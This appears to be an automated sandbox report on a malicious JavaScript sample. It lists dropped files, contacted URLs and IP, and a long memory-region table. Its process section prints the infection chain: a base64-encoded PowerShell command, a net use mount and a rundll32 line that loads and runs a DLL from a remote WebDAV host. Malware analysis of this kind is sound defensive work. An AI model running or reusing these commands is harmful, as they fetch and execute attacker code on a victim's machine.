Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
25458290022066624563.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izsm44k1.jhz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xg5shtqi.yo2.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\25458290022066624563.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4AOAAyAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwA7ADsAOwA7ADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADgAMgBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQA2ADUAMwA4ADEANgAxADAAMAAzADAAOQAzADUALgBkAGwAbAAsAEUAbgB0AHIAeQA=
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\94.159.113.82@8888\davwwwroot\165381610030935.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\94.159.113.82@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.159.113.82:8888/ih
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://94.159.113.82:8888/8
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://94.159.113.82:8888/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.82
|
unknown
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1F342F2E000
|
heap
|
page read and write
|
||
|
1F342F74000
|
heap
|
page read and write
|
||
|
2526CCCF000
|
heap
|
page read and write
|
||
|
1F342F6A000
|
heap
|
page read and write
|
||
|
1F344D86000
|
heap
|
page read and write
|
||
|
2526EE37000
|
heap
|
page read and write
|
||
|
1F344A10000
|
heap
|
page read and write
|
||
|
1F344DA7000
|
heap
|
page read and write
|
||
|
1F342F6A000
|
heap
|
page read and write
|
||
|
281A922B000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F344D9A000
|
heap
|
page read and write
|
||
|
1F344D73000
|
heap
|
page read and write
|
||
|
1F34308B000
|
heap
|
page read and write
|
||
|
B2769DE000
|
stack
|
page read and write
|
||
|
1F34308A000
|
heap
|
page read and write
|
||
|
25200116000
|
trusted library allocation
|
page read and write
|
||
|
1F342F20000
|
heap
|
page read and write
|
||
|
B276FF7000
|
stack
|
page read and write
|
||
|
72D05FE000
|
stack
|
page read and write
|
||
|
8656FCB000
|
stack
|
page read and write
|
||
|
1F342F4D000
|
heap
|
page read and write
|
||
|
1F342F69000
|
heap
|
page read and write
|
||
|
B276893000
|
stack
|
page read and write
|
||
|
1F344D6F000
|
heap
|
page read and write
|
||
|
26E3EB1C000
|
heap
|
page read and write
|
||
|
2526CBE0000
|
heap
|
page read and write
|
||
|
B27699E000
|
stack
|
page read and write
|
||
|
1F342F5F000
|
heap
|
page read and write
|
||
|
D53687E000
|
stack
|
page read and write
|
||
|
1F344D9D000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
26E3EAA0000
|
remote allocation
|
page read and write
|
||
|
281A9520000
|
heap
|
page read and write
|
||
|
26E3EB0E000
|
heap
|
page read and write
|
||
|
1F344DB0000
|
heap
|
page read and write
|
||
|
2526CEB0000
|
heap
|
page execute and read and write
|
||
|
1F344D6E000
|
heap
|
page read and write
|
||
|
1F344D67000
|
heap
|
page read and write
|
||
|
1F344D86000
|
heap
|
page read and write
|
||
|
1F342F51000
|
heap
|
page read and write
|
||
|
1F342F5E000
|
heap
|
page read and write
|
||
|
26E3EA20000
|
heap
|
page read and write
|
||
|
1F342F5C000
|
heap
|
page read and write
|
||
|
1F344D9A000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
281A9234000
|
heap
|
page read and write
|
||
|
B27737B000
|
stack
|
page read and write
|
||
|
7FFD9B972000
|
trusted library allocation
|
page read and write
|
||
|
2526CAE0000
|
heap
|
page read and write
|
||
|
2520001B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F344DA2000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1F344D6B000
|
heap
|
page read and write
|
||
|
2526CE90000
|
heap
|
page read and write
|
||
|
1F342F54000
|
heap
|
page read and write
|
||
|
26E3EAE0000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2526CD6A000
|
heap
|
page read and write
|
||
|
281A922B000
|
heap
|
page read and write
|
||
|
1F344D6E000
|
heap
|
page read and write
|
||
|
26E3EB35000
|
heap
|
page read and write
|
||
|
26E3EB3D000
|
heap
|
page read and write
|
||
|
281A9563000
|
heap
|
page read and write
|
||
|
1F344DA6000
|
heap
|
page read and write
|
||
|
1F34308E000
|
heap
|
page read and write
|
||
|
2526EC31000
|
heap
|
page read and write
|
||
|
2526CD0C000
|
heap
|
page read and write
|
||
|
2526EE0F000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
1F3451E6000
|
heap
|
page read and write
|
||
|
281A9140000
|
heap
|
page read and write
|
||
|
26E3EA50000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
281A9239000
|
heap
|
page read and write
|
||
|
7DF4BF380000
|
trusted library allocation
|
page execute and read and write
|
||
|
B276D7C000
|
stack
|
page read and write
|
||
|
26E3EB12000
|
heap
|
page read and write
|
||
|
1F342F1F000
|
heap
|
page read and write
|
||
|
1F344D9B000
|
heap
|
page read and write
|
||
|
25200053000
|
trusted library allocation
|
page read and write
|
||
|
72D0AFF000
|
stack
|
page read and write
|
||
|
26E3EB21000
|
heap
|
page read and write
|
||
|
1F343080000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
1F342F6A000
|
heap
|
page read and write
|
||
|
72D08FE000
|
stack
|
page read and write
|
||
|
865727E000
|
stack
|
page read and write
|
||
|
2526EDFB000
|
heap
|
page read and write
|
||
|
1F344D93000
|
heap
|
page read and write
|
||
|
26E3EB1C000
|
heap
|
page read and write
|
||
|
865747E000
|
stack
|
page read and write
|
||
|
281AAD30000
|
heap
|
page read and write
|
||
|
1F342FF0000
|
heap
|
page read and write
|
||
|
2526CE95000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
252002C2000
|
trusted library allocation
|
page read and write
|
||
|
281A9218000
|
heap
|
page read and write
|
||
|
2526EB40000
|
heap
|
page read and write
|
||
|
1F345689000
|
heap
|
page read and write
|
||
|
1F342DF0000
|
heap
|
page read and write
|
||
|
1F344D86000
|
heap
|
page read and write
|
||
|
2526EB80000
|
heap
|
page read and write
|
||
|
2526EE00000
|
heap
|
page read and write
|
||
|
1F342F48000
|
heap
|
page read and write
|
||
|
1F344D6E000
|
heap
|
page read and write
|
||
|
2526EC77000
|
heap
|
page execute and read and write
|
||
|
281A9235000
|
heap
|
page read and write
|
||
|
1F344D76000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
2526EBEB000
|
heap
|
page read and write
|
||
|
25200159000
|
trusted library allocation
|
page read and write
|
||
|
2526CEE0000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1F342F30000
|
heap
|
page read and write
|
||
|
1F344D86000
|
heap
|
page read and write
|
||
|
1F34308A000
|
heap
|
page read and write
|
||
|
D5368FE000
|
stack
|
page read and write
|
||
|
26E3EB21000
|
heap
|
page read and write
|
||
|
1F342F60000
|
heap
|
page read and write
|
||
|
25210001000
|
trusted library allocation
|
page read and write
|
||
|
25210010000
|
trusted library allocation
|
page read and write
|
||
|
1F344D60000
|
heap
|
page read and write
|
||
|
1F342F74000
|
heap
|
page read and write
|
||
|
281A9150000
|
heap
|
page read and write
|
||
|
2526EDF0000
|
heap
|
page read and write
|
||
|
B2771FE000
|
stack
|
page read and write
|
||
|
2526CD7B000
|
heap
|
page read and write
|
||
|
281A9252000
|
heap
|
page read and write
|
||
|
1F344D67000
|
heap
|
page read and write
|
||
|
281A923F000
|
heap
|
page read and write
|
||
|
26E3EB48000
|
heap
|
page read and write
|
||
|
281ACA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
26E3EB16000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
72D06FE000
|
stack
|
page read and write
|
||
|
281A9245000
|
heap
|
page read and write
|
||
|
B276CFE000
|
stack
|
page read and write
|
||
|
1F342F74000
|
heap
|
page read and write
|
||
|
2526CD07000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
26E3EAA0000
|
remote allocation
|
page read and write
|
||
|
7FFD9B941000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B944000
|
trusted library allocation
|
page read and write
|
||
|
1F342EF7000
|
heap
|
page read and write
|
||
|
7FFD9B84C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
|
281A9228000
|
heap
|
page read and write
|
||
|
25200064000
|
trusted library allocation
|
page read and write
|
||
|
72D0CFD000
|
stack
|
page read and write
|
||
|
1F344D73000
|
heap
|
page read and write
|
||
|
281A9170000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
72D0BFE000
|
stack
|
page read and write
|
||
|
1F342F74000
|
heap
|
page read and write
|
||
|
26E3EB17000
|
heap
|
page read and write
|
||
|
7FFD9B94A000
|
trusted library allocation
|
page read and write
|
||
|
1F344DAC000
|
heap
|
page read and write
|
||
|
26E3EB16000
|
heap
|
page read and write
|
||
|
281A9234000
|
heap
|
page read and write
|
||
|
26E3EAA0000
|
remote allocation
|
page read and write
|
||
|
1F344D76000
|
heap
|
page read and write
|
||
|
281A9234000
|
heap
|
page read and write
|
||
|
B276F78000
|
stack
|
page read and write
|
||
|
1F342F55000
|
heap
|
page read and write
|
||
|
1F344D7F000
|
heap
|
page read and write
|
||
|
2520006E000
|
trusted library allocation
|
page read and write
|
||
|
1F344D86000
|
heap
|
page read and write
|
||
|
B27707B000
|
stack
|
page read and write
|
||
|
2526CD80000
|
trusted library allocation
|
page read and write
|
||
|
2526CCC1000
|
heap
|
page read and write
|
||
|
1F34308C000
|
heap
|
page read and write
|
||
|
26E3EE45000
|
heap
|
page read and write
|
||
|
26E3EB3B000
|
heap
|
page read and write
|
||
|
1F344DA7000
|
heap
|
page read and write
|
||
|
2526CCDF000
|
heap
|
page read and write
|
||
|
281A9560000
|
heap
|
page read and write
|
||
|
1F344D6B000
|
heap
|
page read and write
|
||
|
25200160000
|
trusted library allocation
|
page read and write
|
||
|
1F344D61000
|
heap
|
page read and write
|
||
|
2526CC93000
|
heap
|
page read and write
|
||
|
72D09FF000
|
stack
|
page read and write
|
||
|
2526CC80000
|
heap
|
page read and write
|
||
|
25200106000
|
trusted library allocation
|
page read and write
|
||
|
2526F170000
|
heap
|
page read and write
|
||
|
2520011A000
|
trusted library allocation
|
page read and write
|
||
|
26E3EB12000
|
heap
|
page read and write
|
||
|
1F342F74000
|
heap
|
page read and write
|
||
|
1F344D7B000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
2526ED10000
|
heap
|
page read and write
|
||
|
25200506000
|
trusted library allocation
|
page read and write
|
||
|
1F344D9A000
|
heap
|
page read and write
|
||
|
2526CCCD000
|
heap
|
page read and write
|
||
|
26E3EB48000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
1F342F59000
|
heap
|
page read and write
|
||
|
1F344DA2000
|
heap
|
page read and write
|
||
|
2526CDA0000
|
trusted library allocation
|
page read and write
|
||
|
D5365AA000
|
stack
|
page read and write
|
||
|
865737C000
|
stack
|
page read and write
|
||
|
252004AC000
|
trusted library allocation
|
page read and write
|
||
|
1F342F4D000
|
heap
|
page read and write
|
||
|
1F342F43000
|
heap
|
page read and write
|
||
|
2526EBC6000
|
heap
|
page read and write
|
||
|
1F344D6E000
|
heap
|
page read and write
|
||
|
1F344DAF000
|
heap
|
page read and write
|
||
|
B2772FE000
|
stack
|
page read and write
|
||
|
1F345979000
|
heap
|
page read and write
|
||
|
1F344D61000
|
heap
|
page read and write
|
||
|
1F344D77000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F34308C000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
2526EBCD000
|
heap
|
page read and write
|
||
|
1F342EF0000
|
heap
|
page read and write
|
||
|
1F344D8F000
|
heap
|
page read and write
|
||
|
25200538000
|
trusted library allocation
|
page read and write
|
||
|
2526EB82000
|
heap
|
page read and write
|
||
|
1F344D86000
|
heap
|
page read and write
|
||
|
1F342F43000
|
heap
|
page read and write
|
||
|
7FFD9B7AC000
|
trusted library allocation
|
page read and write
|
||
|
2526CBC0000
|
heap
|
page read and write
|
||
|
86572FF000
|
stack
|
page read and write
|
||
|
1F344D9A000
|
heap
|
page read and write
|
||
|
1F344D8B000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
281A9580000
|
heap
|
page read and write
|
||
|
1F344DA2000
|
heap
|
page read and write
|
||
|
1F344D77000
|
heap
|
page read and write
|
||
|
281A922F000
|
heap
|
page read and write
|
||
|
2526CCBF000
|
heap
|
page read and write
|
||
|
B276DFE000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
B2770F9000
|
stack
|
page read and write
|
||
|
1F3454F6000
|
heap
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page read and write
|
||
|
2520009D000
|
trusted library allocation
|
page read and write
|
||
|
1F3451E9000
|
heap
|
page read and write
|
||
|
1F344DAF000
|
heap
|
page read and write
|
||
|
2526CC60000
|
trusted library allocation
|
page read and write
|
||
|
26E3EB0E000
|
heap
|
page read and write
|
||
|
1F344D9A000
|
heap
|
page read and write
|
||
|
2526ECF0000
|
heap
|
page read and write
|
||
|
281A9210000
|
heap
|
page read and write
|
||
|
B276FFE000
|
stack
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2526CDF0000
|
heap
|
page read and write
|
||
|
2526CD90000
|
heap
|
page readonly
|
||
|
25200050000
|
trusted library allocation
|
page read and write
|
||
|
1F344D9A000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
26E3EAE8000
|
heap
|
page read and write
|
||
|
72D0EFB000
|
stack
|
page read and write
|
||
|
1F343085000
|
heap
|
page read and write
|
||
|
2521006F000
|
trusted library allocation
|
page read and write
|
||
|
26E3EB21000
|
heap
|
page read and write
|
||
|
1F344D62000
|
heap
|
page read and write
|
||
|
1F342F74000
|
heap
|
page read and write
|
||
|
1F342F74000
|
heap
|
page read and write
|
||
|
72D04F4000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
B276E7E000
|
stack
|
page read and write
|
||
|
2526EC70000
|
heap
|
page execute and read and write
|
||
|
1F344D64000
|
heap
|
page read and write
|
||
|
B276EFF000
|
stack
|
page read and write
|
||
|
1F342ED0000
|
heap
|
page read and write
|
||
|
1F344D7F000
|
heap
|
page read and write
|
||
|
2526CEE5000
|
heap
|
page read and write
|
||
|
1F344D97000
|
heap
|
page read and write
|
||
|
2520053E000
|
trusted library allocation
|
page read and write
|
||
|
281A9585000
|
heap
|
page read and write
|
||
|
1F344D9C000
|
heap
|
page read and write
|
||
|
86573FE000
|
stack
|
page read and write
|
||
|
B276C7E000
|
stack
|
page read and write
|
||
|
2526EBFF000
|
heap
|
page read and write
|
||
|
1F342F49000
|
heap
|
page read and write
|
||
|
1F344DAB000
|
heap
|
page read and write
|
||
|
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
26E3EB35000
|
heap
|
page read and write
|
||
|
1F34537C000
|
heap
|
page read and write
|
||
|
1F344DB0000
|
heap
|
page read and write
|
||
|
1F344EE1000
|
heap
|
page read and write
|
||
|
281A958B000
|
heap
|
page read and write
|
||
|
26E3EA30000
|
heap
|
page read and write
|
||
|
1F344D6F000
|
heap
|
page read and write
|
||
|
1F34308C000
|
heap
|
page read and write
|
||
|
25200055000
|
trusted library allocation
|
page read and write
|
||
|
B27691E000
|
stack
|
page read and write
|
||
|
2526EB30000
|
heap
|
page execute and read and write
|
||
|
25200001000
|
trusted library allocation
|
page read and write
|
||
|
1F344D87000
|
heap
|
page read and write
|
||
|
2526CC20000
|
heap
|
page read and write
|
||
|
B27717F000
|
stack
|
page read and write
|
||
|
26E3EB0A000
|
heap
|
page read and write
|
||
|
25200023000
|
trusted library allocation
|
page read and write
|
||
|
26E3EE40000
|
heap
|
page read and write
|
There are 294 hidden memdumps, click here to show them.